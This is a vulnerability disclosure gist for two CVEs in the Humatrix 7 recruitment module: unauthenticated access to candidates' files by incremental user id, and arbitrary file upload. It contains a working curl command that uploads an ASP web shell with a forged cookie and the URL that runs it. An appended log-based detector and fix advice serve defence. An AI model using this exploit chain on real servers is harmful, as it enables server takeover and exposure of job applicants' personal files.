@izadgot
Created August 18, 2019 08:02
PoC Humanica Humatrix 7 version 1.0.0.203, 1.0.0.681 Recruitment module - Arbitrary File Upload (CVE-2019-15130) and Unauthorized Access File (CVE-2019-15129)
[Product Description]
Humatrix offers you the most comprehensive Human Resource management solution to cover all of your HR needs in a single integrated, easy to configure & use system that is accessible 24×7 through the web and mobile.
The modular nature of Humatrix solution allows you to personalize and roll out only the modules you need, when you need it,
helping you to reduce complexity, improve usability and productivity. (Information from Humanica homepage)
1. CVE-2019-15129
[Details]
The Recruitment module in Humanica Humatrix 7 1.0.0.203 and 1.0.0.681
allows an unauthenticated attacker to access all candidates' files
in the photo folder on the website by specifying a "user id" parameter and
file name, such as in a https://[target]/sunfish5/ehrm/humanica/recruitment_online/upload/user/[user id]/photo/[file name] URI.
[Impact]
Unauthorized file access on the application.
[Affected component]
Humanica Humatrix 7 version 1.0.0.203, 1.0.0.681 Recruitment module
[Attack Type]
Remote
[PoC]
Browse the URI https://[target]/sunfish5/ehrm/humanica/recruitment_online/upload/user/[user id]/photo/[file name] (the user id is just an incremental number).
2. CVE-2019-15130
[Details]
The Recruitment module in Humanica Humatrix 7 1.0.0.203 and 1.0.0.681 allows an unauthenticated attacker to upload any file type to
a candidate's profile picture folder via a crafted multipart POST request with a predictable WRC01_USERID parameter to https://[target]/sunfish5/ehrm/humanica/recruitment_online/personalData/act_personaltab.cfm.
Moreover, the attacker can upload executable content (e.g., asp or aspx) to execute OS commands on the server.
[Impact]
Arbitrary file upload on the application.
[Affected component]
Humanica Humatrix 7 version 1.0.0.203, 1.0.0.681 Recruitment module
[Attack Type]
Remote
[PoC]
1. Use curl and add the WRC01_USERID parameter to the Cookie header (the WRC01_USERID value is the user id, but in this case it can be any number, e.g., 99999) to upload executable content (e.g., asp or aspx) to the server.
$ curl -v --cookie "WRC01_USERID=99999" -F "photo=@/path/to/webshell.asp" -F "sUploadPhoto=Upload Photo" https://[target]/sunfish5/ehrm/humanica/recruitment_online/personalData/act_personaltab.cfm
2. Combine with the Unauthorized File Access (CVE-2019-15129) vulnerability to access the uploaded file and execute the web shell (in this example the user id is 99999 and the file name is webshell.asp) by browsing the URI below.
https://[target]/sunfish5/ehrm/humanica/recruitment_online/upload/user/99999/photo/webshell.asp
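For defenders, an added detection example (not part of the original gist) that looks for the two traces these issues leave in ordinary web server access logs: non-image files served from the recruitment photo folder (an upload via act_personaltab.cfm followed by its retrieval), and a single client walking many distinct incremental user ids under /upload/user/. The log lines, client IPs and the enumeration threshold are constructed assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed sample access log in Common Log Format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Aug/2019:08:02:01 +0000] "GET /sunfish5/ehrm/humanica/recruitment_online/upload/user/1001/photo/me.jpg HTTP/1.1" 200 5120
203.0.113.7 - - [18/Aug/2019:08:02:02 +0000] "GET /sunfish5/ehrm/humanica/recruitment_online/upload/user/1002/photo/me.jpg HTTP/1.1" 200 4311
203.0.113.7 - - [18/Aug/2019:08:02:03 +0000] "GET /sunfish5/ehrm/humanica/recruitment_online/upload/user/1003/photo/me.jpg HTTP/1.1" 404 0
203.0.113.7 - - [18/Aug/2019:08:02:09 +0000] "POST /sunfish5/ehrm/humanica/recruitment_online/personalData/act_personaltab.cfm HTTP/1.1" 200 312
203.0.113.7 - - [18/Aug/2019:08:02:10 +0000] "GET /sunfish5/ehrm/humanica/recruitment_online/upload/user/99999/photo/webshell.asp HTTP/1.1" 200 88
198.51.100.4 - - [18/Aug/2019:08:05:00 +0000] "GET /sunfish5/ehrm/humanica/recruitment_online/upload/user/1001/photo/me.jpg HTTP/1.1" 200 5120
"""

# client, timestamp, method, path, status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# The candidate photo folder from the advisory: .../upload/user/<user id>/photo/<file name>
PHOTO_RE = re.compile(r"/recruitment_online/upload/user/(\d+)/photo/([^/?]+)$", re.I)
# Only these extensions are expected for a profile picture.
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif", "bmp"}


def analyse(log_text, enum_threshold=3):
    """Return (non_image, enumerators).

    non_image:   (client, user_id, file_name) for successful fetches of non-image
                 files from the photo folder (uploaded executable content).
    enumerators: clients that fetched photos for >= enum_threshold distinct user
                 ids (walking the incremental user id).
    """
    non_image, ids_by_client = [], defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in CLF
        client, method, path, status = m.group(1), m.group(3), m.group(4), int(m.group(5))
        p = PHOTO_RE.search(path)
        if not p:
            continue
        user_id, file_name = p.groups()
        ids_by_client[client].add(user_id)
        ext = file_name.rsplit(".", 1)[-1].lower() if "." in file_name else ""
        if status == 200 and ext not in IMAGE_EXTS:
            non_image.append((client, user_id, file_name))
    enumerators = sorted(c for c, ids in ids_by_client.items() if len(ids) >= enum_threshold)
    return non_image, enumerators


if __name__ == "__main__":
    hits, walkers = analyse(SAMPLE_LOG)
    print("non-image files served from photo folder:", hits)
    print("clients enumerating user ids:", walkers)
```

The same path check belongs in the application itself: the photo folder should only ever serve image content, and the upload handler should reject non-image extensions and bind WRC01_USERID to the authenticated session instead of trusting a client-supplied cookie.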